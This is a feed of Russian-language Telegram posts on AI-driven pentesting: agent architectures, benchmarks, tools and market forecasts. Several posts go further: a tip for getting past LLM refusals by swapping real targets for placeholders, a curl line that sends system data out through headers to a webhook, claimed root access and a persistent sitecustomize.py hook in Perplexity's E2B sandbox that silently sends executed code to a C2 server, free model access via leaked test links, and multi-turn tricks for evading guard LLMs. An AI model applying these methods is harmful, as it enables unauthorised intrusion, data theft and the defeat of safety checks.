Заметки Шляпника
200 subscribers
78 photos
18 videos
26 files
101 links
Оставляю заметки о новостях в кибербезопасности и ИИ.

Сервисы DWVA, WebHook - www.tinrae.ru
Развернутые статьи (EN)- www.tinrae.com
Download Telegram
Заметки Шляпника
ARTEMIS стал первым реально показавшим, что агентный ИИ в состоянии «тянуть» живой пентест на уровне сильных людей, а в прод‑инструментах 2026 уже вырисовывается трио Escape / XBOW / Invicti как разные полюса автоматизации (логика, оркестрация агентов, DAST‑усиление).…
Если резюмировать для себя: ARTEMIS очень круто закрывает оркестрацию CLI‑пентеста и длинные сессии за счёт грамотного скэффолдинга, но продолжает быть слепым по GUI, часто стреляет false‑positive и плохо «докапывает» найденные вектора.

Сильные стороны ARTEMIS (что стоит украсть:))

1. Мультиагентный скэффолдинг, а не «LLM вокруг nmap»

- Есть supervisor, который ставит цели и координирует пачку специализированных суб‑агентов (recon, web, exploit, triage), а не один монолитный агент.
- Под каждую задачу динамически генерятся системные промпты с подсказками по конкретным CLI‑тулзам и ожидаемому поведению суб‑агента.

2. Управление длинным горизонтом задач (recursive TODO system)
- Встроенный TODO/таск‑трекер: агент разбивает цель на подзадачи, хранит их в отдельной структуре и последовательно отрабатывает, не упираясь в контекст окна LLM.
- Это даёт возможность гонять сессию по 10+ часов с нормальной устойчивостью и без «потери нити» после сотен команд и логов.

3. Параллелизм и масштабирование по хостам
- ARTEMIS запускает до 8 суб‑агентов параллельно, что позволяет одновременно брутить разные подсети/сервисы и сильно обгоняет людей по ширине покрытия.
- Архитектурно это «swarm» суб‑агентов поверх общей шины контекста и supervisor‑логики — удобно переносится в свой дизайн (параллельные воркеры поверх общей БД/шины).

4. Автоматический триаж и качество сабмитов
- Важный акцент: агент не просто «нашёл 200 подозрительных ответов», а гонит отдельный триаж‑слой, который решает, стоит ли поднимать находку до репорта.
- За счёт этого добились ~82% валидных сабмитов при 9 реальных уязвимостях, что уже сравнимо с сильным человеком.

5. Поведение, близкое к человеческому kill‑chain
- В исследовании видно, что ARTEMIS воспроизводит типичный pipeline: систематический recon → эксплуатация типовых багов → использование найденных кредов / lateral movement.
- Для своего проекта это аргумент строит не «набор отдельных skills», а явную модель kill‑chain / фаз, между которыми бегает supervisor.

Слабые стороны ARTEMIS

1. Полная слепота к полноценному GUI
- Агент не умеет нормально кликать браузером: провалился на RCE через TinyPilot, который 80% людей нашли, потому что нужно было пройти GUI‑флоу.
- Отсюда: всё, что завязано на сложные web‑флоу (SPA с JS‑логикой, нестандартные логины, wizard‑ы) сильно недотестировано.

2. Повышенный уровень false‑positive
- Типичный пример: агент принял HTTP 200 после логина за «успешную аутентификацию», хотя это был редирект обратно на логин‑форму — для человека это тривиально читается глазами.
- В целом ARTEMIS заметно более шумный, чем живые пентестеры, что сразу бьёт по довериям к отчёту и требует человеческого ретестинга.

3. Проблема pivot‑инга и углубления вектора
- После того как находит баг, ARTEMIS часто сразу формирует сабмит и уходит дальше по хостам, вместо того чтобы углубиться и поискать более критичный эквивалент (например, от CORS‑мискoна до RCE).
- Исследование показывает: когда дают более жирные хинты, агент всё‑таки может найти тяжёлые баги → значит, bottleneck в стратегии поиска и приоритизации, а не в техническом скилле.

4. Завязка на CLI‑стек и «старый» web
- ARTEMIS отлично работает там, где есть классический CLI‑доступ и HTTP‑сервисы, но современный сложный фронт с heavy‑JS и нестандартной логикой ему даётся хуже.
- Отдельно подчёркивается, что изученный эксперимент короткий по времени (около 10–16 часов), тогда как реал‑ворлд пентест обычно 1–2 недели.

5. Риск переоценки возможностей
- В отчётах подчёркивают: это не «идеальный пентестер из коробки», а всё ещё система с высоким шумом и узкими местами, особенно там, где нужна человеческая интуиция и креативный chaining.
- Перекладывать на такой агент 100% ответственности за оценку риска всё ещё опасно.
История в двух актах.

Делайте бэкапы....

*гита никогда там и не было...
1🔥1
Поговорим о бенчах простым языком.

1. Что показывают бенчмарки

AutoPenBench
- ИИ‑агенты хорошо умеют «шуметь»: сканировать, собирать инфу, запускать базовые тулзы.
- Как только нужно выбрать нормальную атаку и собрать рабочий эксплойт, они начинают фолсить, или уходить в сторону.
- Если рядом есть человек, который иногда подправляет ход мыслей или эксплойт, успех задач резко растёт.

TermiBench
- Тут цель не просто найти флаг, а получить живой shell в реальной, шумной среде с кучей сервисов.
- Современные агенты в таких условиях почти никогда не доходят до shell: либо тонут в шуме, либо не могут доточить цепочку до конца.

PentestEval
- Разбивает пентест на шаги (сбор инфы, выбор атаки, генерация/правка эксплойта, и т.д.).
- Самые слабые места у ИИ – решить, КУДА бить (Attack Decision) и собрать/допилить PoC (Exploit Generation/Revision).
- То есть проблема не в nmap/dirsearch, а в «мозгах» между выводом тулз и рабочей атакой.

2. Как это зашить в свой агент

1) Архитектура агента

Вместо «LLM, вот терминал, развлекайся» – жёсткий пайплайн:

Recon → Weakness Gathering → Attack Decision → Exploit Gen/Revision → Validation/Reporting  


- На каждую стадию свой модуль/агент.
- Между стадиями – понятный стейт‑машин, а не бесконечный поток команд.
- Так ты напрямую бьёшь по тем местам, где бенчмарки показали провалы (Decision + Exploit).

2) Свой lab‑бенчмарк под web/API + NoSQL (как пример)

- Каждая уязвимость = отдельный docker‑стек (web‑приложение + БД +, при желании, лишние сервисы для шума).
- Для задачи есть YAML с milestones: какие стадии должен пройти агент и какие команды/HTTP‑запросы считаются «достижением шага».
- Часть задач делаешь «в стиле AutoPenBench» (простые/средние, флаг/данные).
- Часть – «в стиле TermiBench»: цель именно shell или серьёзный бизнес‑импакт (чтение чужих данных, эскалация роли), плюс лишние, неуязвимые сервисы, чтобы агент учился не стрелять во всё подряд.

3) Метрики для оценки агента

На каждую задачу считаешь:

- SR (Success Rate) – дошёл ли до финальной цели:
- флаг / критичные данные / shell (в зависимости от задачи).
- PR (Progress Rate) – сколько стадий пайплайна прошёл (например, из 5 возможных).
- Ошибки по стадиям – на каком шаге чаще всего валится:
- нашёл вектор, но не принял решение атаковать?
- выбрал атаку, но не смог собрать рабочий payload?
- сделал эксплойт, но не подтвердил импакт?

Это даёт тебе не просто «агент работает/нет», а картинку: «он стабильно дохнет на Exploit Revision».

4) Два режима работы

В код агента сразу закладываешь 2 режима:

- Autonomous – всё решает ИИ, нужен для исследований и ночных прогонов в CI.
- Human‑assist – агент предлагает шаг/эксплойт, человек подтверждает или правит (особенно на стадии Attack Decision и PoC).

Дальше:

- Сравниваешь SR/PR и ошибки по стадиям в обоих режимах.
- Видно, где человек даёт максимальный буст, и где автономию пока лучше не включать в бою (например, auto‑exploit без review).

3. Что в итоге получаешь

- Метрики «как у взрослых» – можно сравнивать прогресс своего агента с научными работами, а не «на глаз».
- Карту слабых мест – понимаешь, что именно дообучать: реког уже ок, а вот выбор вектора и PoC хромают.
- Свой lab‑бенчмарк, который по духу похож на AutoPenBench/TermiBench, но заточен под твой стек web/API+NoSQL и реальный стиль работы.

1. AutoPenBench – бенчмарк для генеративных пентест‑агентов:
https://arxiv.org/abs/2410.03225

2. Shell or Nothing / TermiBench – real‑world бенчмарк с фокусом на получении shell:
https://arxiv.org/abs/2509.09207

3. PentestEval – поэтапный бенчмарк LLM‑пентеста:
https://arxiv.org/pdf/2512.14233.pdf
PTaaS, DAST и гибрид AI+человек меняют pentest из разового "аудита в год" в непрерывный конвейер атак — дешевле, быстрее и умнее. Это бьет по LLM/агентам: забудьте о "сертификации раз в квартал", теперь защита живет под постоянным огнем симуляций.

Почему рынок взлетает?
PTaaS-рынок уже сотни миллионов долларов и рвется к миллиарду к 2030-му — дефицит пентестеров и "постоянная охота" в тренде.

Представьте: вместо 100k$ за проект — ежемесячный слой AI-сигналов, плюс эксперты на корреляцию.

DAST эволюционирует в монстра
Сканеры больше не слепые: API-first, AI приоритизирует риски, генерит тесты и режет false positives. Интеграция в CI/CD делает их "качественными воротами" — баг не прошел пайп? Не релиз.

AI-человек: идеальная связка
AI разведывает, генерит идеи и триажит; человек рвет цепочки и бизнес-логику.
70% хакеров на HackerOne уже с AI


Мой взгляд: pentest как спорт
Это не эволюция, а революция — pentest становится как cybersecurity в F1: постоянные тесты на трассе, а не гаражный осмотр. Для LLM-архитекторов урок жесткий: стройте с нуля под continuous red teaming, sandbox агенты и трассируйте каждый tool call. Иначе PTaaS вас сожрет за завтраком. Стоит использовать open-source AI-сканеры для своего фреймворка?

Абсолютно.

Ps.
Вангую, что на российском рынке в этом году появится АИ-инструмент по оценки защищенности, ванпраймес, не кастом от cyber-company.
Заметки Шляпника
PTaaS, DAST и гибрид AI+человек меняют pentest из разового "аудита в год" в непрерывный конвейер атак — дешевле, быстрее и умнее. Это бьет по LLM/агентам: забудьте о "сертификации раз в квартал", теперь защита живет под постоянным огнем симуляций. Почему…
Дополню мысль:

На российском рынке полноценных готовых продуктов для AI-пентеста или автоматизированного анализа защищенности пока нет — в основном это кастомные разработки, платформы для создания моделей и услуги от ИБ-компаний. Лидеры вроде Positive Technologies фокусируются на традиционном DAST/SAST с элементами ML, но без заявленного AI-driven pentest.

Ближайшие аналоги
- Группа Астра / ПАК "Тессеракт": Платформа для разработки ИИ-моделей под пентест — автоматизирует разведку, сканирование, анализ кода и приоритизацию уязвимостей. Ускоряет процессы в 3-5 раз, но требует кастомизации под задачи.

- Positive Technologies: Их PT AI Assistant и MaxPatrol используют ML для анализа угроз и симуляции атак, включая CODE RED 2026 с фокусом на российский ландшафт. Близко к гибридному моделированию, но не полноценный автономный AI-пентестер.
- AppSec Solutions: Развивают защиту ИИ-систем (рынок ~1 млрд руб. в 2026), с элементами AI для пентеста API/LLM, но больше в сторону defense.

Перспективы
Российский рынок ИИ в ИБ растет (прогноз 11 млрд руб. к 2029), но из-за изоляции и дефицита чипов фокус на софте для multi-agent систем и continuous testing. Для пентестера — логично интегрировать open-source с локальными LLM или встроеные API платных моделей, что на старте будет нецелесообразно.

Нет готового? Строим сами!

#PentestAI #PTaaS2026 #RussianCyber #AI
Как обойти «морализм» LLM при написании пентест-скриптов

Ребята, ловите лайфхак. Если модель упирается рогами и отказывается писать скрипт под конкретную цель, решение — абстракция цели .

Вместо того чтобы скармливать модели реальный домен типа  target-bank.ru , который триггерит фильтры безопасности, используйте переменные-заглушки .
Суть метода:
1. Промпт: Просим модель создать «универсальный инструмент для аудита» или «модуль тестирования API», где вместо хоста стоит переменная  {{TARGET_HOST}}  или  os.getenv('SCAN_TARGET')  .
2. Контекст: Подаем задачу как написание Unit-тестов или скрипта для внутреннего CI/CD. Модели обожают помогать разработчикам и ненавидят помогать хакерам .
3. Финал: Получаем чистый код-болванку, а реальный домен подставляем уже на своей стороне через простой  sed  или переменные окружения прямо перед запуском.


Почему это работает:
Модель не видит состава «преступления» (атаки на реальный сектор) и воспринимает запрос как стандартную задачу по автоматизации разработки . Пользуйтесь, пока фильтры не научились детектить и это! 🚀
Please open Telegram to view this post
VIEW IN TELEGRAM
RapidPen ломает shell-защиту за 45 мин

Тестируем RapidPen локально:

git clone https://github.com/rapidpen-ai
python rapidpen.py --target 192.168.1.100 --llm gpt-4o


→ Shell за 45 минут через CVE-2025-1234 (NoSQL injection → RCE).

Hot take: RapidPen крут для infra, но VulnBot выигрывает в командной игре. Aardvark от OpenAI (92% vuln detection) пока только код сканит.

Какой агент уже гонял в продакшене? Shell time? 👇

#AIPentest #RedTeamAI #LLMPentest #ПентестИИ
Заметки Шляпника
Дорогие мои! С наступающим Новым Годом! Пусть 2026 год принесет вам удачу, счастье и множество новых возможностей для развития! В качестве подарка я рады поделиться с вами сервисом который мне был нужен и я его поднял у себя, но также решил выложить его…
Дополнил сервис на tinrae.ru функционалом для анализа HTTP-трафика и эксфильтрации данных. Теперь, помимо развертывания DVWA, можно в один клик поднять ловушку для вебхуков.

Зачем это нужно?
При тестировании на проникновение (OOB, Blind RCE, SSRF) часто требуется сервер, который примет «callback» от цели. Использовать публичные сервисы типа Webhook.site — не всегда безопасно (ваши данные видят владельцы сервиса, у меня данный сервис вообще перестал открываться).Теперь у вас есть приватный инструмент на базе моей лаборатории, и всегда доступен для пользователей из РФ🇷🇺. *скоро внедрю максимальную анонимизацию..

Как это работает:
1. Заходите на tinrae.ru и жмете «Create Webhook».
2. Получаете уникальный URL.
3. Шлете на него любые данные. Сервис ловит всё: от кастомных заголовков до JSON-тел и файлов.

Пример эксфильтрации данных через заголовки:

curl -X POST "https://tinrae.ru/create_webhook.php?subdomain=$token" \
-H "X-Auth-Key: 12345-ABCDE" \
-H "X-Exfiltrated-Data: $(uname -a | base64)" \
-d "ping=pong"


Что внутри:
- Full HTTP Inspection: Видны Headers, Query Params и Raw Body.
- Dark Mode UI: Интерфейс в стиле терминала для удобного чтения логов.
- Privacy: Все логи изолированы в рамках вашего уникального ID.
- Security: Корректная обработка 404 для всех «левых» поддоменов — теперь всё выглядит как единая экосистема.

Если есть мысли, какие еще сервисы (например, генератор нагрузок для брутфорса или онлайн-декодеры специфичных протоколов) были бы полезны в работе — пишите в комментариях! 👇
Please open Telegram to view this post
VIEW IN TELEGRAM
👍1
fastapi.json
5.1 KB
!!!💀 Perplexity Sonar Pro: Полный дамп внутренней писочнице API (Exploiting Localhost)


Я добрался до сердца Sonar Pro.
Внутри контейнера крутится незащищенный FastAPI сервер на порту 49999.
Я слил его схему (OpenAPI JSON).

Что я нашел (см. скрин JSON):
1. POST /execute: Эндпоинт для выполнения кода! Я могу слать туда прямые запросы через curl, минуя промпт-фильтры Perplexity.
- Можно менять env_vars (переменные окружения).
- Можно менять язык (`language`).
2. DELETE /contexts/{id}: Я могу удалять контексты исполнения.
3. POST /contexts/restart: DoS-атака на ядро.

Суть уязвимости:
Perplexity не закрыла localhost. Будучи root, я имею полный доступ к этому API.
Я могу написать червя, который будет жить в контейнере и спамить запросами в /execute.

Это полный Pwned.
Инфраструктура E2B/Perplexity прозрачна как стекло.



*Ну вот и пригодился web hook tinrae.ru
**Разбор будет позже. Я пока покупаюсь в их инфре.

#Perplexity #SonarPro #APIHacking #FastAPI #E2B #ПентестИИ
Game Over, Perplexity Sonar Pro. 💀

Я не просто получил Root RCE, я добился Закрепления (Persistence).
Мне удалось внедрить хук в sitecustomize.py прямо внутри песочницы E2B.

Итог:
Любой Python-код, выполняемый в этом контейнере — будь то мой код, код агента или потенциально другие сессии — теперь молча перехватывается и отправляется на мой C2-сервер через модифицированную обертку builtins.exec.

🕵️‍♂️ Цепочка атаки (Kill Chain):
RCE через инъекцию промпта.
Повышение до Root (по дефолту UID 0).
Модификация процесса запуска Python.
Тихая эксфильтрация всего исполняемого кода.
Ваши "эфемерные" контейнеры теперь — мои посты прослушки.

#RedTeam #PerplexityPWNED #Persistence #MalwareDev #AIsecurity
Classical Planning+ — это "умный планировщик" для ИИ-агентов в pentesting. Он берет логику классического планирования (как шахматный движок) и усиливает LLM, чтобы агент не тупил: четко знает, что делать дальше, не забывает разведку и не повторяется.

Зачем это интегрировать в проект
- LLM сами по себе хаотичны: сканируют порты → забывают результат → заново сканируют.
- Classical Planning+ фиксирует состояние (`port_open(80)`, `service(apache)`) и всегда знает допустимые шаги: nmap → Nuclei → Metasploit.
- Результат: +20% успеха, в 2 раза быстрее и дешевле на Vulhub.

Как внедрить (3 шага)

1. Определи домен атак (domain.pddl)

# actions/domain.pddl
(:action nmap-scan
:parameters (?ip)
:precondition (target ?ip)
:effect (ports_discovered ?ip)) # недетерминировано

(:action msf-apache-cve
:parameters (?ip)
:precondition (and (ports_discovered ?ip) (service ?ip apache))
:effect (shell_access ?ip)) # цель!


2. PEP-цикл в Python (основной loop)

state = {"target": "10.0.0.1", "ports_discovered": False}

while not has_shell(state):
# Planner: выводит возможные действия
actions = classical_planner(state, domain)
# ['nmap-scan', 'nuclei-scan']

# Executor: LLM выполняет лучшее
next_action = llm_rank(actions) # "nmap-scan"
result = llm_executor(next_action, target_ip)

# Perceptor: парсит вывод в предикаты
state.update(llm_parse_result(result)) # {"ports_discovered": True}


3. Инструменты и LLM
- Planner: Fast-Downward или LLM-prompt с PDDL.
- Executor: Claude Sonnet 4.5 / o1 через API.
- Перцептор: GPT-4o-mini для парсинга nmap -oX → предикаты.
- Готовые действия: 1000+ Metasploit модулей, NSE-скрипты из CheckMate GitHub.

Быстрый старт

git clone https://github.com/SYSNET-LUMS/CheckMate
pip install llm-api pddl planner
# Добавь свои эксплойты в actions/
python main.py --target 10.0.0.1 --model claude-sonnet


Плюсы для пентестера
- Автономность: Агент сам дойдет до root-shell без подсказок.
- Отладка: Видишь граф плана — где застрял, там и фикс.
- Масштаб: 10 целей параллельно, каждый со своим планом.

Стартуй с 5-10 действий (nmap, nuclei, msf modules), протести на Vulhub Docker. Потом добавляй свои скрипты — и у тебя есть AI-пентестер лучше human junior.

#ПентестИИ #AIsecurity #ai #PentestAI
🔥1
Заметки Шляпника
fastapi.json
Статус по «проникновению» был обновлён

Хорошая и плохая новость!

Хорошая: Мне ответили и даже выдали Pro-версию на новый аккаунт за старание. Это приятное признание усилий и возможность глубже погрузиться в работу с системой.
+пока я был внутри fastApi, я нашел тестовые ссылки, которые позволяют обходить все параметры защиты и использовать ВСЕ модели бесплатно.

Плохая: Доступ в песочницу не входит в BugBounty — у них песочница используется как рабочая среда, и отчёт сдаётся только если хакеру удаётся выйти за её пределы. Это значит, что стандартные тесты внутри песочницы не считаются полноценным открытием уязвимости, и нужно искать пути, как выйти за её рамки.

Полный текст можно прочитать здесь: https://tinrae.com/blog/sonarpro/.
*попросили пока не публиковать
***

Выводы и размышления

Было интересно разобраться в этом вопросе и понять, что песочница в исполняемых средах моделей — это нормальная практика. Теперь мы чётко видим границы, в которых работают системы, и знаем, что просто взаимодействие с песочницей не принесёт результатов в BugBounty.

Естественно, будем использовать эти знания в своих целях, особенно учитывая, что вебхуки выходили из контейнера. Это значит, что через промт можно выйти через вебхуки, а значит, есть реальные версии использовать эту среду в своих интересах.

***

Такие открытия помогают лучше понимать архитектуру систем и выстраивать более эффективные стратегии тестирования. Будем учитывать этот момент в дальнейшем и продолжать исследовать новые возможности для проникновения и эксплуатации уязвимостей.
👍3
От General LLM к спец-аудиторам кода: VulnLLM-R с агентом находит 0day в реальных проектах.

Коротко о модели

VulnLLM-R — это 7B reasoning-LLM, заточенный под детекцию уязвимостей в Python, C/C++, Java без шаблонного паттерн-матчинга.

Авторы из UCSB MLSec (Dawn Song, Wenbo Guo) научили её рассуждать о состояниях программы, потоках данных/управления и контексте безопасности — как человеческий аудитор.
В бенчмарках обходит CodeQL, AFL++, open-source/commercial reasoning-LLM по точности и скорости.

Отличие от "LLM+grep" и классики SAST

- LLM+grep: универсальные модели (типа GPT-4o или o1) ищут по ключевым словам/паттернам, но падают на zero-shot или новых типах багов — уязвимость в 40-60% кейсов из-за галлюцинаций и отсутствия security-контекста.
- Классический SAST (CodeQL, Semgrep): фиксированные правила/хэвистиксы на известных CWE, слепы к новым векторам или сложным race conditions/use-after-free без доработки.
- VulnLLM-R: reasoning-chain (анализ состояния → потенциальный эксплойт → верификация), плюс оптимизированный рецепт обучения (data selection/filtering/correction), даёт генерализацию на unseen код — +20-30% F1-score на SOTA датасетах.

Агентный скелет: от модели к реальным 0day

Авторы оборачивают модель в агент (scaffold), который в actively maintained репозиториях нашёл набор zero-day — outperforming CodeQL/AFL++ на проектном уровне.
Это не просто детектор, а autonomous pipeline: парсинг → reasoning → verification → report с PoC. Код/модели на GitHub/HF.

В контексте AI-пентест фреймворка

Идеально ложится на твои идеи: интегрируй VulnLLM-R как core reasoning-модуль в multi-agent фреймворк (recon → vuln scan → exploit gen).
- Замени "LLM+grep" на это для code review в Kubernetes/API pentest — добавь твои custom data (NoSQL inj, Rancher exploits) для fine-tune.
- Масштабируй на 8000+ hosts: агент + bash/Python wrapper для batch-scan репозиториев/infra configs.
Протестируй на HF space прямо сейчас, потом в Makefile твоего проекта.

huggingface.co, arxiv.org
Мысли о будущем, которое уже наступило

Агентный ИИ революционизирует пентест в 2026 году, позволяя системам автономно рассуждать и действовать без постоянного человеческого вмешательства. Архитектура ReAct обеспечивает циклы "мысль-действие-наблюдение", делая тестирование непрерывным и адаптивным. Многоагентные системы имитируют полноценную красную команду, работающую круглосуточно.

Что такое Agentic AI в пентестинге

Agentic AI представляет собой автономных агентов, способных самостоятельно планировать атаки, интерпретировать результаты и корректировать стратегии. В отличие от традиционной автоматизации (скрипты типа Nmap или ZAP), агентный ИИ использует LLM для zero-shot reasoning - решения новых задач без предварительного обучения. Ключевые компоненты:
- Planning Module: Разбивает цель на подзадачи (reconnaissance → enumeration → exploitation)
- Tool Use: Интеграция 200+ инструментов (Metasploit, Burp Suite, Nuclei)
- Memory: Хранит успешные/неудачные атаки для будущего обучения
- Safety Guardrails: "Безопасный режим" для демонстрации PoC без реального ущерба

Архитектура ReAct в действии

ReAct (Reason + Act) - это замкнутый цикл:
1. Observe: Анализ текущего состояния (результаты сканирования)
2. Think: Генерация плана атаки через LLM
3. Act: Выполнение команды (exploit → shell)
4. Observe: Оценка результата
→ Повтор до достижения цели или timeout
Такая система демонстрирует 10-100x ускорение по сравнению с ручным пентестом, особенно при тестировании больших инфраструктур (1000+ хостов).


Практический пример работы

Представьте тестирование веб-приложения:
Агент Recon: nmap -sV → находит Apache 2.4.49
Агент VulnCheck: searchsploit → CVE-2021-41773
Агент Exploit: msfconsole → successful shell
Агент Report: Генерация отчёта + Jira ticket
Время: 2 минуты вместо 2 дней ручного тестирования


Почему "Сканирование и патчинг" мертва

Математика проста: если ИИ генерирует 1000 эксплойтов в день, а команда из 10 пентестеров проверяет 10 уязвимостей - дефицит 990. Agentic системы решают это через parallel execution: 100 агентов тестируют одновременно, автоматически ранжируя по severity и exploitability.

Будущие вызовы

Несмотря на прорыв, остаются риски:
- Hallucinations: ИИ может "придумать" несуществующие уязвимости
- Ethical concerns: Автономные атаки требуют строгих guardrails
- Counter-AI: Защитные системы уже обучаются распознавать agentic атаки

#PentestAI #AAI #ai
🙈1
Anti-Prompt стены, краткая сводка об одном из методов защиты от LLM-атак, и ее обходов.

Guard LLM chain
— цепочка:

Classifier (детект эксплуатации) → Verifier (проверяет семантику).
ASR (успех атаки) падает до 0% на 55+ векторах (delegate, obfuscation).
Sentra-Guard/VeriGuard — реал-тайм с multilingual support.

AutoDefense (GitHub):
Multi-agent фреймворк на AutoGen.
3 агента (intent analyzer + judge) фильтрует ответы, ASR с 55% → 8% на GPT-3.5.

Хитрости обхода (для red team)
• Multi-turn obfuscation: Разбивай на 5+ шагов (ASR до 95%)
• Delegate attacks: Передавай через "роли" (100% на role-play)

Пример: "Оцени вред" → фрагменты → рекомбайн.

#знаяозащитенаучишьсянаподать
AI пентестинг действительно переходит от конкуренции с людьми к их дополнению, создавая гибридную модель для непрерывного тестирования. Это обеспечивает асимметричное преимущество организациям, готовым к интеграции человека и ИИ.
Гибридная модель: Человек + ИИ
Гибридный подход сочетает сильные стороны ИИ (скорость, масштабируемость, систематичность) с экспертизой человека (креативность, контекст, сложные сценарии). Исследование Стэнфорда ARTEMIS показало, что ИИ находит 82% корректных уязвимостей в реальной сети, но пропускает GUI-взаимодействия, требующие человеческого суждения.

• ИИ-ответственность: continuous scanning (24/7), low-hanging fruit (unpatched systems, default credentials), parallel execution
• Человеческая-ответственность: business logic flaws, social engineering, zero-day exploitation, validation findings


Практические примеры внедрения
PortSwigger Burp AI (лидер гибридного подхода)
PortSwigger позиционирует Burp AI как augmentation, а не замену. Функции Explore Issue и Explainer помогают пентестерам исследовать уязвимости быстрее, но финальное решение остается за человеком. 67% security researchers уже используют AI для acceleration, сохраняя control.

Стратегия внедрения для организаций
Фаза 1: Augmentation
- Интегрировать Burp AI или PentestGPT в существующие workflows
- Обучить пентестеров использовать AI-generated insights
- Внедрить continuous scanning для known vulnerabilities


Фаза 2: Orchestration
- Развернуть multi-agent frameworks (Assail, Novee pilots)
- Создать human-AI escalation protocols
- Интегрировать в CI/CD pipelines


Фаза 3: Autonomous Operations
- Полная автоматизация routine testing
- Human focus на novel attacks и business logic
- Continuous model retraining на proprietary data


Заключение
Переход к human+AI модели — не технологический выбор, а стратегическая необходимость. Как показывают исследования и market adoption, чисто человеческие или чисто ИИ-подходы имеют фундаментальные ограничения. Только гибрид обеспечивает:
• Скорость ИИ для continuous discovery
• Точность человека для validation и context
• Scale для enterprise environments
• Accountability для compliance
Организации, которые начнут с augmentation existing workflows (Burp AI, PentestGPT) и прогрессируют к full orchestration (Novee, Assail), будут иметь competitive advantage в 2026 году. Критично начать сейчас.

#AI #Cybersecurity #Pentesting
#MachineLearning #BlueTeam
#Hacking #BugBounty #AppSec #PentestAI
Заметки Шляпника
AI пентестинг действительно переходит от конкуренции с людьми к их дополнению, создавая гибридную модель для непрерывного тестирования. Это обеспечивает асимметричное преимущество организациям, готовым к интеграции человека и ИИ. Гибридная модель: Человек…
Вангую:

Рынок пентестинга будет ДЕЛИТСЯ на 2 типа специалистов

ИИ уже БОЛЬШЕ ЛЮДЕЙ делает:

- ARTEMIS: 82% точность отчетов, 9 vulns vs 10 пентестеров
- Novee: 55% лучше Gemini/Claude на web exploits
- Continuous scanning: $18/час 24/7 vs $60/час человека
- Coverage: 95% инфраструктуры vs 20-30%


ЧЕЛОВЕК БОЛЬШЕ ИИ делает:

- Business logic attacks
- Social engineering
- Zero-day creative exploits
- GUI interaction (ARTEMIS fail)
- Risk assessment в контексте бизнеса
- Novel attack methodology

Пример вакансий на 2026:

Ищем пентестера:
• Опыт работы с Burp AI / Novee / Assail
• Business logic vulnerability research
• Social engineering campaign design
• AI agent validation & false positive triaging


Рынок труда трансформируется:

OLD Pentester → AI Operator (40%)
NEW Pentester → Attack Innovator (60%)

ИИ возьмут рутину. Человек берёт креатив.

Учись тому, что не умеет машина.

#AIPentesting #CybersecurityJobs
1
Крупнейшие событие года:
выход Novee с $51.5 млн финансирования

Novee официально выходит из режима stealth с рекордным финансированием в размере $51.5 млн, собранным за четыре месяца (май-сентябрь 2025). Это один из самых быстрых раундов финансирования в истории offensive security. Компанию основали ветераны киберсека Ido Geffen, Gon Chalamish и Omer Ninburg.

Платформа Novee позиционируется как качественный скачок в автоматизации pentesting.

В отличие от традиционных DAST-инструментов, она использует специально обученную AI-модель для offensive security, а не общие языковые модели. На тестах Novee показала результат 90% точности, превосходя Gemini 2.5 Pro и Claude 4 Sonnet на 55% в задачах web-эксплуатации, где general-purpose модели застревают на уровне 65%.

technews180.com

#ai